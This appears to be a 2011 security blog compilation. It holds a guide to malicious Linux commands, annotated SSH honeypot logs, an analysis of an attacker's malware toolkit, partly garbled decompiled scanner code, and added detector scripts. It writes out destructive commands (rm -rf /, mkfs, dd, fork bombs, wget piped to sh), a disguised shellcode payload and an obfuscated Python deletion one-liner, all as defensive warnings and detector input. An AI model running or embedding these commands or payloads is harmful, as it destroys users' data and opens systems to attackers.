It's quite obvious why these commands can be dangerous to execute. rm means remove, -f means force deletion (even if write protected), and -r means do it recursively, i.e. all subfolders. Therefore, rm -rf / means force a deletion of everything in the root directory and all subfolders. rm -rf . means to force deletion of the current directory and all subfolders. rm -rf * means to force deletion of all files in the current folder and all subfolders.

rm -rf /
rm -rf .
rm -rf *

Another variation of this, which would also force deletion of the current folder and all subfolders, would be:

rm -r .[^.]*

which will only exclude the parent directory ..

Reformat Data on device

Whatever follows the mkfs command will be destroyed and replaced with a blank filesystem.

mkfs
mkfs.ext3
mkfs.anything

Block device manipulation

These commands cause raw data to be written to a block device. Often this will clobber the filesystem and cause total loss of data:

any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb

Although perhaps intriguing and curiosity-provoking, these commands execute a huge number of processes until the system freezes, forcing a hard reset of the computer (which may cause data corruption, operating system damage, or other awful fate).

In Bourne-ish shells (like Bash):

:(){:|:&};:

In Perl:

fork while fork

Tarbomb

Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or can inject files into the system by guessing filenames. You should always decompress tar archives to a clean directory with nothing else in it. Only after determining that the extracted files are what was expected should the extracted files be copied to the final target directory.

Decompression bombs

Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GBs, filling your hard drive. You should never download and extract any data, utility, or software from an untrusted source.

Malicious code in Shell scripts

Someone gives you the link to a shell script (executable from the command line interface using the script execution command ./ ) and recommends that you download and execute it. The script might contain any command whatsoever, whether benign or malevolent. Never execute code from people you don't trust. Examples:

wget http://some_place/some_file
sh ./some_file

or

wget http://some_place/some_file -O- | sh

Malicious source code to be compiled then executed

Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile or execute the resulting compiled code unless the source is some well-known application obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address). A famous example of this was code that surfaced on a mailing list. It was disguised as a proof of concept sudo exploit. It was claimed that if you ran the code, sudo would grant root privileges without a shell (which is what the commands gksudo and kdesudo are for). In the downloaded code was this malicious payload:
char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ =
"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

To the new or even somewhat experienced computer user, this looks like the hex code gibberish stuff that is so typical of a safe proof-of-concept. However, this actually runs

rm -rf ~ / &

which will destroy your home directory as a regular user, or all files if you are logged in as root. If you were able to recognize commands in hex string format, you would already be such an expert user that you would never run such untrusted code. But for the rest of us, we must remember that malicious code comes in many novel forms; be wary about installing code that you know nothing about and the source of which you don't absolutely trust. Here is another monstrous example (in Python) that no self-respecting programmer or user would ever execute:

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

in which sn!.sg!+ is simply the rm -rf * command shifted a character up in order to disguise it from casual examination. I wouldn't expect anyone with experience in Python to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong, but how many casual users are fluent in Python?
1. http://www.ubuntuguide.org/ 2. http://ubuntuguide.org/wiki/Malicious_Linux_Commands 3. http://ubuntuguide.org/wiki/Ubuntu:All#Screensavers
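The guide suggests watching logs for these commands; here is a small detector for the command families it lists, written as an added example (not code from the guide or from this blog) to run over commands captured by a honeypot. The signature regexes and the static decoder for the chr(ord(i)-1) trick are my own constructions, and the sample commands are taken from the guide above.

```python
import re

# Signatures for the command families the guide above lists. These regexes are
# constructed for this example; they flag the exact forms shown in the guide and
# deliberately do not match ordinary uses such as "rm -rf /tmp/build".
SIGNATURES = [
    ("recursive forced delete of /, ., * or ~",
     re.compile(r"\brm\s+(?:-\S*[rR]\S*\s+)+(?:/|\.(?:\[\^\.\]\*)?|\*|~)(?=\s|$)")),
    ("filesystem creation on a device",
     re.compile(r"\bmkfs(?:\.\w+)?\b")),
    ("raw write to a block device",
     re.compile(r"(?:>\s*/dev/[sh]d[a-z]|\bdd\b.*\bof=/dev/)")),
    ("shell fork bomb",
     re.compile(r":\(\)\s*\{\s*:\s*\|\s*:\s*&\s*\}\s*;\s*:")),
    ("perl fork bomb",
     re.compile(r"\bfork\s+while\s+fork\b")),
    ("download piped straight into a shell",
     re.compile(r"\b(?:wget|curl)\b.*\|\s*(?:ba|da|z)?sh\b")),
]

# The obfuscation from the guide: a literal rebuilt at runtime by shifting every
# character by a constant, e.g. chr(ord(i)-1) for i in "sn!.sg!+".
SHIFT_OBFUSCATION = re.compile(
    r'chr\(ord\(\w+\)\s*([+-])\s*(\d+)\)\s+for\s+\w+\s+in\s+"([^"]*)"')

# The guide's own Python one-liner, kept here as input for the decoder.
OBFUSCATED = """python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'"""


def deobfuscate_shift(command):
    """Statically undo a chr(ord(c) +/- n) comprehension; return the hidden text or None."""
    m = SHIFT_OBFUSCATION.search(command)
    if not m:
        return None
    sign, n, literal = m.group(1), int(m.group(2)), m.group(3)
    delta = n if sign == "+" else -n
    return "".join(chr(ord(c) + delta) for c in literal)


def classify(command):
    """Return the signature labels a command matches, including any hidden payload."""
    hits = [label for label, rx in SIGNATURES if rx.search(command)]
    hidden = deobfuscate_shift(command)
    if hidden is not None:
        hits.extend("obfuscated: " + label for label, rx in SIGNATURES if rx.search(hidden))
    return hits


def scan_commands(commands):
    """Map each flagged command (e.g. the CMD: lines of a Kippo log) to its labels."""
    report = {}
    for cmd in commands:
        hits = classify(cmd)
        if hits:
            report[cmd] = hits
    return report


if __name__ == "__main__":
    # Constructed sample: a mix of the guide's examples and harmless commands.
    sample = ["uname -a", "rm -rf /tmp/build", "rm -rf ~ / &", "mkfs.ext3 /dev/sdb1",
              "wget http://some_place/some_file -O- | sh", ":(){:|:&};:", OBFUSCATED]
    for cmd, labels in scan_commands(sample).items():
        print("%-50s %s" % (cmd[:50], ", ".join(labels)))
```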


1.1.14

Ducati Motorcycle Default Password Vulnerability. (2011-09-30 12:42)

There's an interesting vulnerability writeup at [1]osvdb.org detailing how to gain unauthorized access to a [2]Ducati Motorcycle using the default ignition password. Apparently by default the ignition password is set to the last 4 digits of the motorcycle's VIN.
1. http://osvdb.org/ 2. http://osvdb.org/show/osvdb/75811

1.2

October

1.2.1

Flash Drives: Helping Spread Malware since Y2K (2011-10-05 03:00)

Flash drives are an ever-growing threat in the computer industry. They are quickly becoming one of the most targeted infection methods for malware. Does your organization have a policy to address the vulnerabilities associated with USB Flash Drives? In this case, [1]Dilbert says it best.

See Also: [2]ENISA USB Flash Drive Whitepaper hosted by Sandisk
1. http://www.dilbert.com/2011-09-29/ 2. http://www.sandisk.com/media/226716/enisa-whitepaper.pdf

1.2.2

A look at a simple SSH probe and password crack (2011-10-05 22:05)

Here's an annotated look at how an attacker using an SSH password cracker compromises servers.

First the attacker probes to see if SSH is accepting connections. Most likely the scanner also attempted to fingerprint the IP address to identify the operating system. This is most likely an automated process on a compromised system.

2011-10-05 05:08:56-0400 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 221.176.11.13:35868 (192.168.1.165:22) [session: 0]
2011-10-05 05:08:56-0400 [HoneyPotTransport,0,221.176.11.13] connection lost

Next the attacker begins attempting to crack the SSH password for the root user. Once again these attempts are automated, and use a cracking tool which is based upon SSH-2.0-libssh-0.11.

2011-10-05 05:30:40-0400 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 221.176.11.13:57366 (192.168.1.165:22) [session: 1]
2011-10-05 05:30:41-0400 [HoneyPotTransport,1,221.176.11.13] Remote SSH version: SSH-2.0-libssh-0.11
2011-10-05 05:30:41-0400 [HoneyPotTransport,1,221.176.11.13] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2011-10-05 05:30:41-0400 [HoneyPotTransport,1,221.176.11.13] outgoing: aes256-cbc hmac-sha1 none
2011-10-05 05:30:41-0400 [HoneyPotTransport,1,221.176.11.13] incoming: aes256-cbc hmac-sha1 none

2011-10-05 05:30:41-0400 [HoneyPotTransport,1,221.176.11.13] NEW KEYS
2011-10-05 05:30:42-0400 [HoneyPotTransport,1,221.176.11.13] starting service ssh-userauth
2011-10-05 05:30:42-0400 [SSHService ssh-userauth on HoneyPotTransport,1,221.176.11.13] root trying auth keyboard-interactive
2011-10-05 05:30:43-0400 [SSHService ssh-userauth on HoneyPotTransport,1,221.176.11.13] login attempt [root/root123] failed
2011-10-05 05:30:43-0400 [SSHService ssh-userauth on HoneyPotTransport,1,221.176.11.13] root failed auth keyboard-interactive
2011-10-05 05:30:43-0400 [SSHService ssh-userauth on HoneyPotTransport,1,221.176.11.13] unauthorized login:
2011-10-05 05:30:43-0400 [SSHService ssh-userauth on HoneyPotTransport,1,221.176.11.13] root trying auth password
2011-10-05 05:30:43-0400 [SSHService ssh-userauth on HoneyPotTransport,1,221.176.11.13] login attempt [root/root123] failed
2011-10-05 05:30:44-0400 [-] root failed auth password
2011-10-05 05:30:44-0400 [-] unauthorized login:
2011-10-05 05:30:44-0400 [HoneyPotTransport,1,221.176.11.13] Got remote error, code 11 reason: Bye Bye
2011-10-05 05:30:44-0400 [HoneyPotTransport,1,221.176.11.13] connection lost
2011-10-05 05:30:55-0400 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 221.176.11.13:60753 (192.168.1.165:22) [session: 2]
2011-10-05 05:30:55-0400 [HoneyPotTransport,2,221.176.11.13] Remote SSH version: SSH-2.0-libssh-0.11
2011-10-05 05:30:55-0400 [HoneyPotTransport,2,221.176.11.13] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2011-10-05 05:30:55-0400 [HoneyPotTransport,2,221.176.11.13] outgoing: aes256-cbc hmac-sha1 none
2011-10-05 05:30:55-0400 [HoneyPotTransport,2,221.176.11.13] incoming: aes256-cbc hmac-sha1 none
2011-10-05 05:30:56-0400 [HoneyPotTransport,2,221.176.11.13] NEW KEYS
2011-10-05 05:30:56-0400 [HoneyPotTransport,2,221.176.11.13] starting service ssh-userauth
2011-10-05 05:30:57-0400 [SSHService ssh-userauth on HoneyPotTransport,2,221.176.11.13] root trying auth keyboard-interactive
2011-10-05 05:30:57-0400 [SSHService ssh-userauth on HoneyPotTransport,2,221.176.11.13] login attempt [root/123456] succeeded
2011-10-05 05:30:57-0400 [SSHService ssh-userauth on HoneyPotTransport,2,221.176.11.13] root authenticated with keyboard-interactive
2011-10-05 05:30:57-0400 [SSHService ssh-userauth on HoneyPotTransport,2,221.176.11.13] starting service ssh-connection
2011-10-05 05:30:57-0400 [HoneyPotTransport,2,221.176.11.13] Got remote error, code 11 reason: Bye Bye
2011-10-05 05:30:57-0400 [HoneyPotTransport,2,221.176.11.13] connection lost

Once the SSH password has been cracked, the attacker connects manually from another IP address, most likely his/her own system. Note that the attacker is using PuTTY, indicating he/she is using a Windows system.

2011-10-05 05:31:45-0400 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 2.192.102.247:50155 (192.168.1.165:22) [session: 3]

2011-10-05 05:31:46-0400 [HoneyPotTransport,3,2.192.102.247] Remote SSH version: SSH-2.0-PuTTY Release 0.61
2011-10-05 05:31:46-0400 [HoneyPotTransport,3,2.192.102.247] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2011-10-05 05:31:46-0400 [HoneyPotTransport,3,2.192.102.247] outgoing: aes256-ctr hmac-sha1 none
2011-10-05 05:31:46-0400 [HoneyPotTransport,3,2.192.102.247] incoming: aes256-ctr hmac-sha1 none
2011-10-05 05:31:48-0400 [HoneyPotTransport,3,2.192.102.247] NEW KEYS
2011-10-05 05:31:48-0400 [HoneyPotTransport,3,2.192.102.247] starting service ssh-userauth
2011-10-05 05:31:50-0400 [SSHService ssh-userauth on HoneyPotTransport,3,2.192.102.247] root trying auth none
2011-10-05 05:31:50-0400 [SSHService ssh-userauth on HoneyPotTransport,3,2.192.102.247] root trying auth keyboard-interactive
2011-10-05 05:31:55-0400 [SSHService ssh-userauth on HoneyPotTransport,3,2.192.102.247] login attempt [root/123456] succeeded
2011-10-05 05:31:55-0400 [SSHService ssh-userauth on HoneyPotTransport,3,2.192.102.247] root authenticated with keyboard-interactive
2011-10-05 05:31:55-0400 [SSHService ssh-userauth on HoneyPotTransport,3,2.192.102.247] starting service ssh-connection
2011-10-05 05:31:55-0400 [SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] got channel session request

Finally the attacker performs several simple commands to identify the operating system, then disconnects, recording the compromised systems for future use.
2011-10-05 05:31:55-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] channel open
2011-10-05 05:31:56-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] pty request: xterm (24, 80, 0, 0)
2011-10-05 05:31:56-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] Terminal size: 24 80
2011-10-05 05:31:56-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] getting shell
2011-10-05 05:31:56-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] Opening TTY log: log/tty/20111005-053156-9094.log
2011-10-05 05:31:57-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] /etc/motd resolved into /etc/motd
2011-10-05 05:31:57-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] /var/run/motd resolved into /var/run/motd
2011-10-05 05:32:01-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] CMD: uptime
2011-10-05 05:32:01-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] Command found: uptime
2011-10-05 05:32:05-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] CMD: uname -a
2011-10-05 05:32:05-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] Command found: uname -a
2011-10-05 05:32:37-0400 [HoneyPotTransport,3,2.192.102.247] connection lost
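As an added example (my code, not part of the original post), a small Python parser for Kippo log lines of the kind shown above that reconstructs sessions and flags the pattern the walkthrough describes: a credential cracked from one host and then reused by a different host with a different SSH client. The sample lines are constructed to mirror the walkthrough, with documentation-range IP addresses in place of the real ones.

```python
import re

# Constructed sample in Kippo's log format, modelled on the walkthrough above.
# The IP addresses are documentation-range placeholders, not the real attacker's.
SAMPLE_LOG = """\
2011-10-05 05:30:40-0400 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 203.0.113.10:57366 (192.168.1.165:22) [session: 1]
2011-10-05 05:30:41-0400 [HoneyPotTransport,1,203.0.113.10] Remote SSH version: SSH-2.0-libssh-0.11
2011-10-05 05:30:43-0400 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.10] login attempt [root/root123] failed
2011-10-05 05:30:44-0400 [HoneyPotTransport,1,203.0.113.10] connection lost
2011-10-05 05:30:55-0400 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 203.0.113.10:60753 (192.168.1.165:22) [session: 2]
2011-10-05 05:30:55-0400 [HoneyPotTransport,2,203.0.113.10] Remote SSH version: SSH-2.0-libssh-0.11
2011-10-05 05:30:57-0400 [SSHService ssh-userauth on HoneyPotTransport,2,203.0.113.10] login attempt [root/123456] succeeded
2011-10-05 05:30:57-0400 [HoneyPotTransport,2,203.0.113.10] connection lost
2011-10-05 05:31:45-0400 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 198.51.100.7:50155 (192.168.1.165:22) [session: 3]
2011-10-05 05:31:46-0400 [HoneyPotTransport,3,198.51.100.7] Remote SSH version: SSH-2.0-PuTTY_Release_0.61
2011-10-05 05:31:55-0400 [SSHService ssh-userauth on HoneyPotTransport,3,198.51.100.7] login attempt [root/123456] succeeded
2011-10-05 05:32:01-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,198.51.100.7] CMD: uptime
2011-10-05 05:32:05-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,198.51.100.7] CMD: uname -a
2011-10-05 05:32:37-0400 [HoneyPotTransport,3,198.51.100.7] connection lost
"""

# One regex per line type we care about; everything else (kex, NEW KEYS, ...) is skipped.
TS = r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d[+-]\d{4}) "
RE_NEW = re.compile(TS + r"\[kippo\.core\.honeypot\.HoneyPotSSHFactory\] New connection: "
                    r"(?P<ip>[\d.]+):\d+ \(.*?\) \[session: (?P<sid>\d+)\]$")
RE_VER = re.compile(TS + r"\[HoneyPotTransport,(?P<sid>\d+),[\d.]+\] Remote SSH version: (?P<ver>.+)$")
RE_AUTH = re.compile(TS + r"\[SSHService ssh-userauth on HoneyPotTransport,(?P<sid>\d+),[\d.]+\] "
                     r"login attempt \[(?P<user>[^/\]]+)/(?P<pw>[^\]]*)\] (?P<result>failed|succeeded)$")
RE_CMD = re.compile(TS + r"\[SSHChannel session \(\d+\) on SSHService ssh-connection on "
                    r"HoneyPotTransport,(?P<sid>\d+),[\d.]+\] CMD: (?P<cmd>.+)$")


def parse_sessions(log_text):
    """Group Kippo log lines into sessions keyed by Kippo's session number."""
    sessions = {}
    for line in log_text.splitlines():
        m = RE_NEW.match(line)
        if m:
            sessions[m.group("sid")] = {"ip": m.group("ip"), "start": m.group("ts"),
                                        "client": None, "attempts": [], "commands": []}
            continue
        m = RE_VER.match(line)
        if m and m.group("sid") in sessions:
            sessions[m.group("sid")]["client"] = m.group("ver")
            continue
        m = RE_AUTH.match(line)
        if m and m.group("sid") in sessions:
            sessions[m.group("sid")]["attempts"].append(
                (m.group("user"), m.group("pw"), m.group("result") == "succeeded"))
            continue
        m = RE_CMD.match(line)
        if m and m.group("sid") in sessions:
            sessions[m.group("sid")]["commands"].append(m.group("cmd"))
    return sessions


def analyze(sessions):
    """Count failed logins per source and flag a credential reused from a second host."""
    failed = {}
    first_success = {}   # (user, password) -> session id that first logged in with it
    findings = []
    for sid in sorted(sessions, key=int):
        s = sessions[sid]
        for user, pw, ok in s["attempts"]:
            if not ok:
                failed[s["ip"]] = failed.get(s["ip"], 0) + 1
                continue
            cred = (user, pw)
            if cred not in first_success:
                first_success[cred] = sid
                continue
            origin = sessions[first_success[cred]]
            if origin["ip"] != s["ip"]:
                findings.append({
                    "credential": "%s/%s" % cred,
                    "cracked_from": origin["ip"], "cracker_client": origin["client"],
                    "reused_from": s["ip"], "reuse_client": s["client"],
                    "reused_at": s["start"], "commands": list(s["commands"]),
                })
    return {"failed_attempts": failed, "findings": findings}


if __name__ == "__main__":
    report = analyze(parse_sessions(SAMPLE_LOG))
    print("failed attempts by source:", report["failed_attempts"])
    for f in report["findings"]:
        print("credential %(credential)s cracked from %(cracked_from)s (%(cracker_client)s), "
              "then used from %(reused_from)s (%(reuse_client)s); commands: %(commands)s" % f)
```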

I'll keep an eye out for future attempts to use this honeypot from that IP address for malicious purposes. Hopefully I'll get some interesting results. Some interesting info on the attacker's real IP address: http://network-tools.com/default.asp?prog=express&host=2.192.102.247

% Information related to 2.192.0.0 - 2.195.255.255
inetnum: 2.192.0.0 - 2.195.255.255
netname: TIM-NET
descr: Telecom Italia Mobile
descr: Service Provider
country: IT

It appears our attacker is using a mobile phone as his internet connection.

Related Reading: [1]Best Practices for Enterprise Network Security. This paper discusses aligning security policies to correspond with the priorities of business assets, establishing security profiles for users and all the types of devices accessing your network, and creating online self-service centers for users.
1. http://caffinesecurity-blogspot.tradepub.com/free-offer/best-practices-for-enterprise-network-security/w_aaaa1617

1.2.3

What's in a hacker's toolkit? (2011-10-11 20:45)

An attacker recently gained access to my honeypot, and began uploading hack tools using wget. While his hack tools did not actually infect anything, I retained a copy for evaluation, and even gained access to his FTP server which contained all of his tools. The available tools in this attacker's bag of tricks are quite interesting.

[1] The attacker's first tool in his/her bag of tricks is a simple Linux virus (light.tgz) designed to infect binaries in the /bin folder of the system, called [2]Linux/Rst.a. According to VirusTotal, this virus has a [3]74 % detection rate. Accompanying this virus is a file called inst. This file contains a shell script which sets configuration settings for connecting to multiple IRC servers and joining a specific IRC channel, which acts as a command and control center for the now infected system. Rst.a isn't the only tool in the attacker's toolkit. Let's take a look at a few other files:

biz.tgz - [4]72.1 % detected by VirusTotal, the B variant of the Rst virus above (Rst.b).
hecaru.rar - [5]72.1 % detected by VirusTotal, a [6]DDoS attack bot
ActivWin2008R2.zip - [7]32.6 % detected by VirusTotal, a hack tool which apparently allows the user to use a pirated copy of Windows perpetually, but most likely also installs additional, malicious, software.
vnc.tgz - [8]16.3 % detected by VirusTotal, a copy of the attacker's SSH scan tool
cacat.tgz - [9]67.4 % detected by VirusTotal, another version of the SSH scan tool
shony.tgz - [10]18.6 % detected by VirusTotal, a backdoor/trojan IRC bot
zmeu configuration files, part of the attacker's botnet
An iso of a (Russian?) version of Win 2k8 R2

Finally, a couple of very interesting files which are being forwarded to AV vendors for analysis... The file i has a [11]4.7 % detection rate on VirusTotal, and its actual intentions are unknown. The file is 2.51 MB, rather large for your usual virus. The file f.jpg has a [12]7 % detection rate on VirusTotal, and once again its intentions are unknown. The IP address of this attacker is 188.76.246.77, which originates from Spain.
1. http://3.bp.blogspot.com/-00JaJWIClTI/TpTZD7cKPEI/AAAAAAAAAGg/QEkGQ33FKDs/s1600/hacktoolkit.png
2. http://www.mcafee.com/threat-intelligence/malware/default.aspx?id=99978
3. http://www.virustotal.com/file-scan/report.html?id=b1072d23d47519728b24d1191fafb8a515ed16e38e5a23c2f8463942006ae388-1294945727
4. http://www.virustotal.com/file-scan/report.html?id=9fd7ef49dd26c24a7619e4e00b4c162efbd8d3a286d1c5976819dcc70f8f98cc-1318379056
5. http://www.virustotal.com/file-scan/report.html?id=dbfe5e25fdbdece83687c2b361364c14adf08ab1b7ee328d71c8071724e90584-1318374066
6. http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=DoS%3APerl%2FUDPFlood.A&ThreatID=-2147328293
7. http://www.virustotal.com/file-scan/report.html?id=da954fdc04142815e4233edd487e412773198fd49224e3a98133fdc6b5ac97ef-1318374779
8. http://www.virustotal.com/file-scan/report.html?id=90e5952a04923107f57804cc089f2e806493a343ca9642a186bf8adc7e3bf596-1318378879
9. http://www.virustotal.com/file-scan/report.html?id=f242567d4cbf090988fa28ec198bc1c4b69c749fb9b38fe108e69ede29368688-1318379559
10. http://www.virustotal.com/file-scan/report.html?id=3aee2b4fa97d97d26f74341d83c00a082959e8692259837791c6aac8961392ef-1318379055
11. http://www.virustotal.com/file-scan/report.html?id=5533cb176eb7a5cd9eda6af2bf7cd62a87e6c2a024423f111c372a29fa6622a5-1318376172
12. http://www.virustotal.com/file-scan/report.html?id=3f963a4fa1d35bc69a1563eef87c5f042c0f34fff7fd57341cc7fc568e21a90e-1318379242

1.2.4

Netscape 8? Really? (2011-10-12 17:00)

I was browsing my demographics for target audience, and was VERY shocked to see Netscape 8 as one of the browsers someone was using to read this security blog. The last update for Netscape 8 was in [1]2007... I hate to imagine how many vulnerabilities that browser has. I counted over 20 unpatched vulnerabilities at the [2]SecurityFocus Vulnerability Database. If you're the person visiting my blog using Netscape...please...upgrade.

[3]
1. http://en.wikipedia.org/wiki/Netscape_Browser 2. http://www.securityfocus.com/bid 3. http://1.bp.blogspot.com/-CPPKDCLaT1A/TpW_DqxXvVI/AAAAAAAAAGo/y8RL-RxncEI/s1600/ns8wtf.PNG

1.2.5

Mystery Malware Examined (2011-10-12 18:54)

In a previous post, I looked inside a hacker's toolkit, and found two mystery files, i and f. Analysis of these files has revealed that they were both Linux executables. In addition to forwarding these files to AV vendors, I am analyzing them myself. Using decompile-it.com, I was able to retrieve source code for i, and limited source for f. i (with its [1]4.7 % detection rate) was compiled in debug mode, and contains three source files. It appears to be some sort of SSH scanner. Unfortunately it's been a while since I programmed, so if anyone can shed some light on what this code does, please post a comment.

Auth.c:

#include "auth.c.h"

static char *keys_path[5] = { 0, "%s/.ssh/identity", "%s/.ssh/id_dsa", "%s/.ssh/id_rsa", 0 };
static char *pub_keys_path[5] = { 0, "%s/.ssh/identity.pub", "%s/.ssh/id_dsa.pub", "%s/.ssh/id_rsa.pub", 0 };

int ask_userauth( SSH_SESSION *session )
{
    if ( session->auth_service_asked == 0 && ssh_service_request( session, "ssh-userauth" ) == 0 )
    {
        session->auth_service_asked++;
    }
    return 0;
}

void burn( char *ptr )
{
    if ( ptr )
    {
        ( ptr );
    }
    return;
}

int wait_auth_status( SSH_SESSION *session, int kbdint )
{
    int err;
    /* phantom */ int cont;
    STRING *can_continue;
    u8 partial = 0;
    char *c_cont;

channels.c:

#include "channels.c.h"

CHANNEL *channel_new( SSH_SESSION *session )
{
    int ebx;
    int edi;
    /* phantom */ CHANNEL *channel;
    memset( malloc( 72 ), 0, 72 );
    *(int*)malloc( 72 )/*.8*/ = session->error.error_code;
    *(int*)malloc( 72 )/*.64*/ = session->version;
    *(int*)malloc( 72 )/*.52*/ = buffer_new( );
    *(int*)malloc( 72 )/*.56*/ = buffer_new( );
    if ( *(int*)(malloc( 72 ) + 8 + 1212) == 0 )
    {
        session->channels = malloc( ( 1 ) * sizeof( CHANNEL ) );
        *(int*)malloc( 72 )/*.4*/ = malloc( 72 );
    }
    *(int*)malloc( 72 )/*.4*/ = *(int*)(malloc( 72 ) + 8 + 1212);
    *(int*)(malloc( 72 )) = *(int*)(*(int*)(malloc( 72 ) + 8 + 1212));
    *(int*)(*(int*)(malloc( 72 )) + 4) = malloc( 72 );
    return *(int*)(malloc( 72 )) + 4;
}

u32 ssh_channel_new_id( SSH_SESSION *session )
{
    session->maxchannel++;
    return session->maxchannel;
}

client.c:

#include "client.c.h"

char *ssh_get_banner( SSH_SESSION *session )
{
    char buffer[128];
    int i = 0;
    do
    {
        if ( session->fd < 0 || read( session->fd, buffer, 1 ) <= 0 )
        {
            ssh_set_error( (void*)session, 2, "Remote host closed connection" );
            return 0;
        }
        if ( buffer[0] != '\r' )
        {
            if ( ebx == '\n' )
            {
                buffer[ i ] = 0;
                return strdup( buffer );
            }
            i++;
        }
        else
        {
            i++;
            buffer[0] = 0;
            if ( i + 1 == 127 )

Unfortunately f (with its [2]7 % detection rate) was not compiled in debug mode, and cannot be as easily examined. However, its purpose can be inferred from the char arrays (strings) which are contained within the program:

// Minimal support for non-debug binary...
char _fp_hw[];
char _IO_stdin_used[];
char esel[];
char initial_perm[];
char BITMASK[];
char longmask[];
char rots[];
char pc1[];
char bytemask[];
char pc2[];
char perm32[];
char final_perm[];
char sbox[];
char any_descr[];
char _nl_C_name[];
char pcap_version_string[];
char charmap[];
char _dl_out_of_memory[];
char map[];
char yy_ec[];
char yy_accept[];
char yy_def[];
char yy_meta[];
char yy_base[];
char yy_chk[];

Based upon the pcap version string I believe it may be safe to say that f is a packet sniffer of some sort.
1. http://www.virustotal.com/file-scan/report.html?id=5533cb176eb7a5cd9eda6af2bf7cd62a87e6c2a024423f111c372a29fa6622a5-1318376172 2. http://www.virustotal.com/file-scan/report.html?id=3f963a4fa1d35bc69a1563eef87c5f042c0f34fff7fd57341cc7fc568e21a90e-1318379242
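The inference from the table names can be mechanised. As an added example (my code, not the blog's), here is a minimal strings(1)-style extractor run over a constructed byte blob, matching the symbol names the post lists against the code they are known to come from: the DES permutation and S-box tables of a crypt(3)-style implementation, libpcap's version string, and the tables flex emits for a generated lexer. The blob and the threshold logic are constructed for this example; the real file f was not available to me.

```python
import re

# Constructed stand-in for a stripped binary: ELF-like junk wrapped around string
# constants with the same names the post lists for f. Not the real file.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"pcap_version_string\x00" + b"\x90\x00\x01"
    + b"initial_perm\x00pc1\x00pc2\x00sbox\x00final_perm\x00rots\x00"
    + b"\x01\x02\x00" + b"yy_ec\x00yy_accept\x00yy_def\x00" + b"\xff" * 4
    + b"_IO_stdin_used\x00"
)

# Names that fingerprint a library or generator. All are well known: the DES
# tables used by crypt(3)-style code, libpcap's version string, flex's lexer tables.
INDICATORS = {
    "DES tables (crypt(3)-style implementation)":
        {"initial_perm", "final_perm", "pc1", "pc2", "perm32", "sbox", "rots", "esel"},
    "libpcap (packet capture)": {"pcap_version_string"},
    "flex-generated lexer (parses text input)":
        {"yy_ec", "yy_accept", "yy_def", "yy_meta", "yy_base", "yy_chk"},
}


def extract_strings(blob, min_len=3):
    """Printable ASCII runs of at least min_len bytes, like strings(1) (whose default is 4)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def infer_capabilities(blob, min_hits=2):
    """Return {capability: matching names} for every indicator set with enough hits.

    min_hits guards against one short, common name misfiring on its own; an
    indicator set smaller than min_hits (the lone libpcap string) needs all its names.
    """
    found = set(extract_strings(blob))
    result = {}
    for capability, names in INDICATORS.items():
        hits = sorted(names & found)
        if hits and len(hits) >= min(min_hits, len(names)):
            result[capability] = hits
    return result


if __name__ == "__main__":
    for capability, names in infer_capabilities(SAMPLE_BINARY).items():
        print("%-45s <- %s" % (capability, ", ".join(names)))
```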

1.2.6

A look at the various advance fee fraud methods... (2011-10-13 02:00)

